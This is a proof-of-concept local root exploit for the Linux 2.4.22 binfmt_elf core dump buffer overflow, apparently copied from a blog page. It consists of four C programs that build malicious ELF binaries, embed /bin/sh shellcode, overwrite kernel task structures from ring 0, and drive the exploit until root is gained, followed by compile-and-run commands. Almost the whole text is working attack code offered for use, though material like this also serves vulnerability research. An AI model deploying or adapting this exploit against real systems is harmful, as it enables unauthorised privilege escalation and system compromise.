#
####################################################
#
# Linux binfmt_elf core dump buffer overflow (PoC)
# (Kernel-2.4.22)
#
# 2006-04-30
# Written by :
# grip2
# airsupply
#
####################################################
## overflow.c
cat <<> overflow.c
/*
* Written by :
* grip2
* airsupply
*/
#include
#include
#include
#include
#include
#include
#include
int main(int argc, char *argv[])
{
int esp;
struct rlimit rl;
int res;
int i;
char *env[10];
char page[PAGE_SIZE];
__asm__("movl %%esp, %0" : : "m"(esp));
printf("arg_start: %p arg_end: %p esp: %p\n",
argv[0], argv[argc-1]+strlen(argv[argc-1]), esp);
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
res = setrlimit(RLIMIT_CORE, &rl);
if (res != 0) {
perror("setrlimit");
goto err;
}
memset(page, 'A', sizeof(page));
page[sizeof(page)-1] = 0;
for (i = 0; i < 9; i++)
env[i] = page;
env[i] = 0;
if (strcmp(argv[0], "SELF2") == 0) {
char *av[] = {"badelf", page, 0};
execve("badelf", av, NULL);
/* execve("test_elf", av, NULL); */
perror("execve: badelf");
goto err;
}
char *av[] = {"SELF2", 0};
execve(argv[0], av, env);
perror("execve self:");
goto err;
return 0;
err:
return 1;
}
__EOF__
## mkbadelf.c
cat <<> mkbadelf.c
/*
* Written by grip2
*/
#include
#include
#include
#include
#include
#include
#include
#include
char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
extern test;
__asm__ (
"test:\n\t"
"cli \n\t"
"hlt \n\t"
"movl \$0xbffff000, %eax \n\t"
// "movl \$0x42, (%eax) \n\t"
"int3 \n\t"
);
int main()
{
#define ENTRY_OFFSET 4096
int fd = -1;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Shdr shdr;
int i;
unsigned char code_align[4096];
unsigned char data_align[0x7000];
fd = open("badelf", O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd == -1) {
perror("open badelf");
goto err;
}
memset(&ehdr, 0, sizeof(ehdr));
ehdr.e_ident[EI_MAG0] = 0x7f;
ehdr.e_ident[EI_MAG1] = 'E';
ehdr.e_ident[EI_MAG2] = 'L';
ehdr.e_ident[EI_MAG3] = 'F';
ehdr.e_ident[EI_CLASS] = ELFCLASS32;
ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
ehdr.e_ident[EI_VERSION] = EV_CURRENT;
ehdr.e_type = ET_EXEC ;
ehdr.e_machine = EM_386;
ehdr.e_version = EV_CURRENT;
ehdr.e_ehsize = sizeof(Elf32_Ehdr);
ehdr.e_phentsize = sizeof(Elf32_Phdr);
ehdr.e_shentsize = sizeof(Elf32_Shdr);
ehdr.e_phnum = 2;
ehdr.e_phoff = sizeof(Elf32_Ehdr);
ehdr.e_shnum = 0;
ehdr.e_shoff = 0;
ehdr.e_shstrndx = 0;
ehdr.e_flags = 0;
ehdr.e_entry = 0x08480000 + ENTRY_OFFSET;
write(fd, &ehdr, sizeof(ehdr)); /* Elf header */
phdr.p_type = PT_LOAD;
phdr.p_offset = 0;
phdr.p_vaddr = 0x08480000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_memsz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;
write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */
phdr.p_type = PT_LOAD;
phdr.p_offset = ENTRY_OFFSET + sizeof(code_align);
phdr.p_vaddr = 0xbfff8000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz =sizeof(data_align);
phdr.p_memsz = sizeof(data_align);
phdr.p_flags = 0;
phdr.p_align = 0x1000;
write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */
lseek(fd, ENTRY_OFFSET, SEEK_SET);
memset(code_align, '\x90', sizeof(code_align));
#if 1
//unsigned char int3 = 0xcc;
//memcpy(code_align, &int3, sizeof(int3));
memcpy(code_align, &test, 32);
#else
memcpy(code_align, sc, sizeof(sc));
#endif
write(fd, code_align, sizeof(code_align)); /* part of TEXT Segment */
memset(data_align, 'A', sizeof(data_align));
lseek(fd, ENTRY_OFFSET + sizeof(code_align), SEEK_SET);
write(fd, data_align, sizeof(data_align)); /* DATA Segment */
close(fd);
return 0;
err:
if (fd != -1)
close(fd);
return -1;
}
__EOF__
## mklcall.c
cat <<> mklcall.c
/*
* Written by :
* grip2
* airsupply
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int \$0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}
static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count)
char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void exploit_end(void);
struct list_head {
struct list_head *next, *prev;
};
struct task_struct {
/*
* offsets of these are hardcoded elsewhere - touch with care
*/
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
unsigned long flags; /* per process flags, defined below */
int sigpending;
unsigned long addr_limit; /* thread address space:
0-0xBFFFFFFF for user-thead
0-0xFFFFFFFF for kernel-thread
*/
struct exec_domain *exec_domain;
volatile long need_resched;
unsigned long ptrace;
int lock_depth; /* Lock depth */
/*
* offset 32 begins here on 32-bit platforms. We keep
* all fields in a single cacheline that are needed for
* the goodness() loop in schedule().
*/
long counter;
long nice;
unsigned long policy;
void *mm;
int processor;
/*
* cpus_runnable is ~0 if the process is not running on any
* CPU. It's (1 << cpu) if it's running on a CPU. This mask
* is updated under the runqueue lock.
*
* To determine whether a process might run on a CPU, this
* mask is AND-ed with cpus_allowed.
*/
unsigned long cpus_runnable, cpus_allowed;
/*
* (only the 'next' pointer fits into the cacheline, but
* that's just fine.)
*/
struct list_head run_list;
unsigned long sleep_time;
struct task_struct *next_task, *prev_task;
void *active_mm;
struct list_head local_pages;
unsigned int allocation_order, nr_local_pages;
/* task state */
void *binfmt;
int exit_code, exit_signal;
int pdeath_signal; /* The signal sent when the parent dies */
/* ??? */
unsigned long personality;
int did_exec:1;
unsigned task_dumpable:1;
pid_t pid;
pid_t pgrp;
pid_t tty_old_pgrp;
pid_t session;
pid_t tgid;
/* boolean value for session group leader */
int leader;
/*
* pointers to (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->p_pptr->pid)
*/
struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
struct list_head thread_group;
/* PID hash table linkage. */
struct task_struct *pidhash_next;
struct task_struct **pidhash_pprev;
struct list_head wait_chldexit; /* for wait4() */
};
static inline void __list_add(struct list_head *new,
struct list_head *prev,
struct list_head *next)
{
next->prev = new;
new->next = next;
new->prev = prev;
prev->next = new;
}
static inline void add_task_list(struct task_struct *head, struct task_struct *tsk)
{
tsk->next_task = head;
tsk->prev_task = head->prev_task;
head->prev_task->next_task = tsk;
head->prev_task = tsk;
}
static inline struct task_struct * get_current(void)
{
struct task_struct *current;
__asm__("andl %%esp,%0; ":"=r" (current) : "0" (~8191UL));
return current;
}
void exploit_start(void) {}
void exploit()
{
__asm__ __volatile__ ("
nop
nop
jmp x1
nop
nop
nop
nop
nop
nop
x1:
cli ## must do
pusha
pushl %esp
popl %eax
sidt (%eax)
movl 2(%eax),%eax
xorl %ebx,%ebx
movb \$0xfb,%bl
rol \$0x3,%ebx
add %ebx,%eax
movw 6(%eax),%di
rol \$16,%edi
movw (%eax),%di
find_smp:
inc %edi
movb (%edi),%bl
cmpb \$0xe8,%bl
jnz find_smp
inc %edi
add (%edi),%edi
find:
dec %edi
movl (%edi),%eax
and \$0x0000ffff,%eax
cmpl \$0x00ec83,%eax
jnz find
aaaa:
jmp xxx
bback:
push %edi
ret
xxx:
call bback
bbbbbb:
cli ## must do
popa
nop
ret
");
{
struct list_head *runqueue_head;
struct task_struct *init_task;
struct task_struct *current, *parent, *copy_task;
int i;
runqueue_head = (void *) 0xc0335ec0;
init_task = (void *) 0xc037c000;
//__asm__ ("cli");
for(i = 0; i < 100000000; i++) /* wait a moment ... */
__asm__ __volatile__ ("nop");
__asm__ __volatile__ ("
movl (%1),%0;"
:"=r" (parent)
:"r" (20)); /* task pointer of parent */
copy_task = parent->p_cptr;
current = get_current();
runqueue_head->prev = runqueue_head;
runqueue_head->next = runqueue_head;
init_task->prev_task = init_task;
init_task->next_task = init_task;
/*
for (i = 0; i < 20; i++) {
tsk = find_task_by_pid(i);
if (tsk && tsk->state == 0) {
__list_add(&tsk->run_list, runqueue_head, runqueue_head->next);
add_task_list(&init_task, tsk);
}
}
*/
if (parent->state == 0) {
__list_add(&parent->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, parent);
}
if (parent->p_pptr->state == 0) {
__list_add(&parent->p_pptr->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, parent->p_pptr);
}
memcpy(current, copy_task, sizeof(struct task_struct));
__list_add(¤t->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, current);
/*
* current->p_opptr
* current->p_pptr
*/
current->p_cptr = NULL;
current->p_ysptr = NULL;
current->p_osptr = NULL;
current->pid = 65535;
current->state = -1;
current->need_resched = 1;
current->sigpending = 0;
}
#ifdef __TEST_LCALL__
i = 'A';
for (;;)
g_write(1, &i, 1);
for (;;) __asm__ __volatile__("hlt");
#endif
/* __asm__ ("sti"); */
}
/*
extern exploit;
__asm__ (
"exploit:\n\t"
"cli \n\t"
"hlt \n\t"
"int3 \n\t"
);
*/
void exploit_end(void) {}
static inline g_syscall3(int, sigaction, int, signum, const struct sigaction *, act,
struct sigaction *, oldact)
void lcall(void);
void lcall_end(void);
void lcall(void)
{
struct sigaction old, new;
void *loop_addr;
__asm__ volatile (
"jmp get_loop_addr\n\t"
"ret_loop_addr:\n\t"
"popl %0\n\t"
:"=m" (loop_addr) :);
bzero(&new, sizeof(new));
new.sa_handler = loop_addr;
g_sigaction(SIGSEGV, &new, &old);
__asm__ volatile (
"jmp do_lcall;"
"get_loop_addr: "
"call ret_loop_addr;"
"ret;"
"do_lcall:"
);
while (1) {
__asm__ ("lcall \$0x7, \$0x0");
}
}
void lcall_end(void) {}
int main()
{
#define ENTRY_OFFSET 4096
int fd = -1;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Shdr shdr;
int i;
unsigned char code_align[4096];
fd = open("lcall", O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd == -1) {
perror("open lcall");
goto err;
}
memset(&ehdr, 0, sizeof(ehdr));
ehdr.e_ident[EI_MAG0] = 0x7f;
ehdr.e_ident[EI_MAG1] = 'E';
ehdr.e_ident[EI_MAG2] = 'L';
ehdr.e_ident[EI_MAG3] = 'F';
ehdr.e_ident[EI_CLASS] = ELFCLASS32;
ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
ehdr.e_ident[EI_VERSION] = EV_CURRENT;
ehdr.e_type = ET_EXEC ;
ehdr.e_machine = EM_386;
ehdr.e_version = EV_CURRENT;
ehdr.e_ehsize = sizeof(Elf32_Ehdr);
ehdr.e_phentsize = sizeof(Elf32_Phdr);
ehdr.e_shentsize = sizeof(Elf32_Shdr);
ehdr.e_phnum = 2;
ehdr.e_phoff = sizeof(Elf32_Ehdr);
ehdr.e_shnum = 0;
ehdr.e_shoff = 0;
ehdr.e_shstrndx = 0;
ehdr.e_flags = 0;
ehdr.e_entry = 0x08480000 + ENTRY_OFFSET;
write(fd, &ehdr, sizeof(ehdr)); /* Elf header */
phdr.p_type = PT_LOAD;
phdr.p_offset = 0;
phdr.p_vaddr = 0x08480000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_memsz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;
write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */
phdr.p_type = PT_LOAD;
phdr.p_offset = ENTRY_OFFSET + sizeof(code_align);
phdr.p_vaddr = 0x0;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = sizeof(code_align);
phdr.p_memsz = sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;
write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */
memset(code_align, '\x90', sizeof(code_align));
memcpy(code_align, lcall, &lcall_end - &lcall);
lseek(fd, ENTRY_OFFSET, SEEK_SET);
write(fd, code_align, sizeof(code_align)); /* part of TEXT Segment */
/* virtual address 0x00000000:
* [execdomain name pointer][handler for syscalls][stack & register save][jmp code][task pointer of parent])
* 4 4 8 4 4
*/
memset(code_align, '\x90', sizeof(code_align));
memcpy(code_align, "\x90\x90\xff\x25\x08\x00\x00\x00", 8); /* handler for syscalls */
// memcpy(code_align, "\x00\x00\x00\x00\x08\x00\x00\x00", 8); /* handler for syscalls */
memcpy(code_align+8, &exploit, &exploit_end - &exploit);
// memcpy(code_align, sc, sizeof(sc));
lseek(fd, ENTRY_OFFSET + sizeof(code_align), SEEK_SET);
write(fd, code_align, sizeof(code_align)); /* 0x0 Segment for lcall27 */
close(fd);
return 0;
err:
if (fd != -1)
close(fd);
return -1;
}
__EOF__
## kexp_coredump.c
cat <<> kexp_coredump.c
/*
* Written by :
* grip2
* airsupply
*/
#include
#include
#include
#include
#include
#include
#define BINELF_OVERFLOW "overflow"
#define BINELF_LCALL "lcall"
#include
#include
#include
#include
#include
void *first_o_task = NULL;
void *o_task, *y_task;
void *parent_task = NULL;
struct list_head {
struct list_head *next, *prev;
};
struct task_struct {
/*
* offsets of these are hardcoded elsewhere - touch with care
*/
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
unsigned long flags; /* per process flags, defined below */
int sigpending;
unsigned long addr_limit; /* thread address space:
0-0xBFFFFFFF for user-thead
0-0xFFFFFFFF for kernel-thread
*/
struct exec_domain *exec_domain;
volatile long need_resched;
unsigned long ptrace;
int lock_depth; /* Lock depth */
/*
* offset 32 begins here on 32-bit platforms. We keep
* all fields in a single cacheline that are needed for
* the goodness() loop in schedule().
*/
long counter;
long nice;
unsigned long policy;
void *mm;
int processor;
/*
* cpus_runnable is ~0 if the process is not running on any
* CPU. It's (1 << cpu) if it's running on a CPU. This mask
* is updated under the runqueue lock.
*
* To determine whether a process might run on a CPU, this
* mask is AND-ed with cpus_allowed.
*/
unsigned long cpus_runnable, cpus_allowed;
/*
* (only the 'next' pointer fits into the cacheline, but
* that's just fine.)
*/
struct list_head run_list;
unsigned long sleep_time;
struct task_struct *next_task, *prev_task;
void *active_mm;
struct list_head local_pages;
unsigned int allocation_order, nr_local_pages;
/* task state */
void *binfmt;
int exit_code, exit_signal;
int pdeath_signal; /* The signal sent when the parent dies */
/* ??? */
unsigned long personality;
int did_exec:1;
unsigned task_dumpable:1;
pid_t pid;
pid_t pgrp;
pid_t tty_old_pgrp;
pid_t session;
pid_t tgid;
/* boolean value for session group leader */
int leader;
/*
* pointers to (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->p_pptr->pid)
*/
struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
struct list_head thread_group;
/* PID hash table linkage. */
struct task_struct *pidhash_next;
struct task_struct **pidhash_pprev;
struct list_head wait_chldexit; /* for wait4() */
};
static int read_coredump(int pid)
{
char corefile[128];
char _task[0x1000];
FILE *fd=NULL;
int tmp_size;
int rd_len=0;
struct task_struct *ptask;
// task_struct *task_s;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Nhdr nhdr;
memset(corefile,0,sizeof(corefile));
memset(_task,0,sizeof(_task));
sprintf(corefile,"./core.%d",pid);
printf("opening:%s\n",corefile);
if((fd=open(corefile,O_RDONLY))==NULL)
{
perror("open coredump file:");
exit(-1);
}
// lseek(fd,sizeof(Elf32_Ehdr),SEEK_SET);
read(fd,&ehdr,sizeof(Elf32_Ehdr));
read(fd,&phdr,sizeof(Elf32_Phdr));
/*
printf("sizeof Elf32_Ehdr:%x\n",sizeof(Elf32_Ehdr));
printf("ehdr.e_phoff:%x\n",ehdr.e_phoff);
printf("ehdr.e_phnum:%x\n",ehdr.e_phnum);
printf("phdr.p_type:%x\n",phdr.p_type);
printf("phdr.p_offset:%x\n",phdr.p_offset);
printf("phdr.p_filesz:%x\n",phdr.p_filesz);
*/
//read Elf32_Nhdr elf_note
lseek(fd,phdr.p_offset,SEEK_SET);
while(1){
read(fd,&nhdr,sizeof(Elf32_Nhdr));
if(nhdr.n_type==0x4)
break;
// printf("%x\n",nhdr.n_descsz);
lseek(fd,nhdr.n_descsz+4,SEEK_CUR);
}
lseek(fd,4,SEEK_CUR);
rd_len=read(fd,&_task,nhdr.n_descsz);
ptask=(struct task_struct *)&_task;
// printf("pid: %d\n",ptask->pid);
y_task = ptask->p_ysptr;
o_task = ptask->p_osptr;
if (!first_o_task)
first_o_task = o_task;
if (!parent_task)
parent_task = ptask->p_pptr;
// printf("parent: %p\n", ptask->p_pptr);
return 0;
}
static int check_coredump(int pid)
{
int n;
if (read_coredump(pid) == -1)
return 0;
n = ((long) y_task - (long) first_o_task) / 8192;
printf("parent: %p overflow: %p lcall: %p [%d]\n",
parent_task, first_o_task, y_task, n);
if (n > 0 && n <= 10)
return 1;
return 0;
}
static void make_coredump()
{
struct rlimit rl;
int res;
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
res = setrlimit(RLIMIT_CORE, &rl);
if (res != 0) {
perror("setrlimit");
return;
}
*(int *) 0 = 0;
}
static int fix_lcall()
{
int fd;
fd = open(BINELF_LCALL, O_RDWR);
if (fd == -1) {
perror("open "BINELF_LCALL);
return -1;
}
/* virtual address 0x00000000:
* [execdomain name pointer][handler for syscalls][stack & register save][jmp code][task pointer of parent])
* 4 4 8 4 4
*/
lseek(fd, 8192+4+4+8+4, SEEK_SET);
write(fd, &parent_task, sizeof(parent_task));
close(fd);
return 0;
}
int main(int argc, char *argv[])
{
int pipe_of[2] = {-1, -1};
int pipe_lcall[2] = {-1, -1};
int pipe_mcd[2] = {-1, -1};
int mcd_pid, lcall_pid, copy_pid;
int status;
int i;
if (pipe(pipe_of) == -1) {
perror("pipe overflow");
goto err;
}
if (pipe(pipe_mcd) == -1) {
perror("pipe make_coredump");
goto err;
}
if (pipe(pipe_lcall) == -1) {
perror("pipe_lcall");
goto err;
}
/* overflow process */
if (fork() == 0) {
char cmd[32];
if (read(pipe_of[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_of");
exit(1);
}
if (strncmp(cmd, "start", 5) == 0) {
char *p[] = {BINELF_OVERFLOW, cmd+5, 0};
execve(BINELF_OVERFLOW, p, 0);
perror(BINELF_OVERFLOW);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_of command \"%s\" error!\n", cmd);
exit(1);
}
while (1) {
/* make coredump file process */
if ((mcd_pid = fork()) == 0) {
char cmd[8];
if (read(pipe_mcd[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_mcd");
exit(1);
}
if (strcmp(cmd, "start") == 0) {
make_coredump();
fprintf(stderr, "make coredump file failed!\n");
exit(1);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_mcd command \"%s\" error!\n", cmd);
exit(1);
}
/* lcall process */
if ((lcall_pid = fork()) == 0) {
char cmd[8];
if (read(pipe_lcall[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_lcall");
exit(1);
}
if (strcmp(cmd, "start") == 0) {
char *p[] = {BINELF_LCALL, 0};
execve(BINELF_LCALL, p, 0);
perror(BINELF_LCALL);
exit(1);
}
else if (strcmp(cmd, "pause") == 0) {
pause();
exit(0);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_lcall command \"%s\" error!\n", cmd);
exit(-1);
}
write(pipe_mcd[1], "start", 6);
sleep(1);
while (1) {
if (waitpid(mcd_pid, &status, 0) < 0)
break;
}
if (!check_coredump(mcd_pid)) {
write(pipe_lcall[1], "pause", 6);
system("rm -rf core.*");
continue;
}
break;
}
if (fix_lcall() == -1)
goto err;
if ((copy_pid = fork()) == 0) {
char *p[] = {"lcall", 0};
execve("lcall", p, 0);
perror("lcall");
while (1)
printf("panic ...\n");
}
write(pipe_lcall[1], "start", 6);
sleep(1);
kill(copy_pid, SIGSTOP);
printf("please press
getchar();
printf("exploiting, wait a moment ...\n");
char ofcmd[16];
sprintf(ofcmd, "start%d\0", lcall_pid);
write(pipe_of[1], ofcmd, strlen(ofcmd)+1);
FILE *fp;
char buf[256];
while(1) {
printf("******** in parent, waiting for root\n");
fp = fopen("/proc/interrupts","r");
while (!feof(fp)) {
fgets(buf, sizeof(buf), fp);
printf(buf);
}
fclose(fp);
for(i = 0; i < 2000000000; i++);
}
return 0;
err:
if (pipe_lcall[0] != -1) {
close(pipe_lcall[0]);
close(pipe_lcall[1]);
}
if (pipe_mcd[0] != -1) {
close(pipe_mcd[0]);
close(pipe_mcd[1]);
}
if (pipe_of[1] != -1) {
close(pipe_of[0]);
close(pipe_of[1]);
}
return 1;
}
__EOF__
make kexp_coredump
make overflow
make mkbadelf
gcc mklcall.c -o mklcall -O2
./mkbadelf
./mklcall
./kexp_coredump
没有评论:
发表评论